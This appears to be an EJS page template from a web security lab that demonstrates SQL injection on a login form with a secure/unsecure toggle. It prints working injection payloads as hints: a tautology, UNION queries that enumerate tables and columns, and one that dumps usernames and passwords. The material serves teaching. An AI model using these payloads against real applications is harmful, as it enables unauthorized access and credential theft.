<!DOCTYPE html>
<html>

<head>
    <title>Web2Lab2</title>
    <link rel="stylesheet" type="text/css" href="/index.css">
</head>

<% let text = ""; %>
<% if (username) { %>
<% text = "Hello " + username; %>
<% } else if (error) { %>
<% text = error; %>
<% } %>

<body>
    <h1>Hello! Welcome to SQL Injection Demo</h1>
    <form action="/task1/secure" method="POST">
        <div class="grid-container">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" required>
        </div>
        <div class="grid-container">
            <label for="password">Password:</label>
            <input type="password" id="password" name="password" required>
        </div>
        <div>
            <button class="button" type="submit">Login</button>
        </div>
    </form>

    <div id="message">
        <p><%= text %></p>
    </div>

    <div id="security-mode">
        <p>Security Mode: <span id="security-status">Secure</span></p>
    </div>

    <button class="button" id="security-toggle">Toggle Security</button>

    <a href="/"><button class="button">Home</button></a>

    <div>SQL Injection commands are below:</div>
    <div>Standard (easy) command, returns all usernames:</div>
    <div class="help">' or 1 = '1</div>
    <div>Command for listing all tables in database:</div>
    <div class="help">' union select 3,table_name,'1' from information_schema.tables where table_schema='public' union
        select 5,'6','7</div>
    <div>Command for listing all columns from database:</div>
    <div class="help">' union select 3,column_name,null from information_schema.columns where table_name='users' union
        select 5,'6','7</div>
    <div>Command for listing all users with corresponding passwords:</div>
    <div class="help">' union all select 3, concat(username, ':', password),'4' from Users union all select 5,'6','7
    </div>


    <script>
        const securityToggle = document.getElementById('security-toggle');
        const securityStatus = document.getElementById('security-status');
        const form = document.querySelector('form');
        let isSecure = "<%= isSecure %>";
        if (isSecure == "true") {
            isSecure = true;
        } else {
            isSecure = false
        }
        updateSecurityStatus();

        function updateSecurityStatus() {
            if (isSecure) {
                securityStatus.textContent = 'Secure';
                form.action = "/task1/secure";
            } else {
                securityStatus.textContent = 'Unsecure';
                form.action = "/task1/unsecure";
            }
        }
        securityToggle.addEventListener('click', () => {
            isSecure = !isSecure;
            updateSecurityStatus();
        });
    </script>

</body>

</html>

</body>

</html>